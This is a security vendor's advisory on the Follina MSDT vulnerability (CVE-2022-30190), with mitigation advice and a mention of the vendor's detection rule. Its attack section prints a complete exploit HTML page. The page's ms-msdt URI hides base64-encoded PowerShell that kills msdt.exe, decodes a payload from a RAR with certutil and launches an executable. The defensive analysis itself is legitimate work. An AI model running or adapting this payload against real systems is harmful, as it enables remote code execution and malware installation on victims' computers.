Vulnerability report written by the TA team by analyzing "MS Office Zero-day vulnerability Follina(CVE-2022-30190)"
CVE-2022-30190 is a remote code execution (RCE) vulnerability in Microsoft Support Diagnostic Tool (MSDT) that could allow attackers to execute arbitrary commands on a victim's system via a malicious Word document.
To prevent this vulnerability, it is important to apply the latest security patches and disable the MSDT protocol. Users should be careful not to open documents from unknown sources.
1. Overview
This is a security flaw related to MS Office document handling functionality in Microsoft Windows. The vulnerability allows malicious code to be executed, specifically via Word documents, and could allow an attacker to execute remote code without victim intervention. CVE-2022-30190 occurs in the Microsoft Support Diagnostic Tool (MSDT) in Windows, and exploitation of this vulnerability could allow an attacker to perform remote code execution (RCE).
2. Attack Type
In the Word document where the vulnerability was identified, the vulnerability was caused by the download and execution of a vulnerable HTML file through a URL connection in the External tag, which is a known method.
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-- raw --
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../..//Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>
</body>
</html>
When a word document with the above code is forwarded to the victim by mail and further actions, and then opened or previewed, MSDT downloads and executes a malicious script on a remote server. This is an attack that allows the attacker to execute arbitrary commands on the victim's computer.
3. Response
The universal response to the Follina vulnerability is as follows
- Apply security patches: immediately install security updates provided by Microsoft.
- Disable MSDT: Use a registry editor to disable the ms-msdt protocol.
- Beware of document files: Do not open documents from unknown sources, and be especially careful not to use the preview feature of Word documents.
Our AIWAF product detects protocols such as ms-msdt in the 316: Command Injection (ms-msdt) pattern, which is detected as normal.
4. Conclusion
CVE-2022-30190 is a vulnerability that can pose a significant threat to MS Office users. If left untreated, it can allow attackers to remotely execute malicious code and take over a victim's system. Therefore, it is important to apply the latest security updates, disable the MSDT protocol, and other security measures.
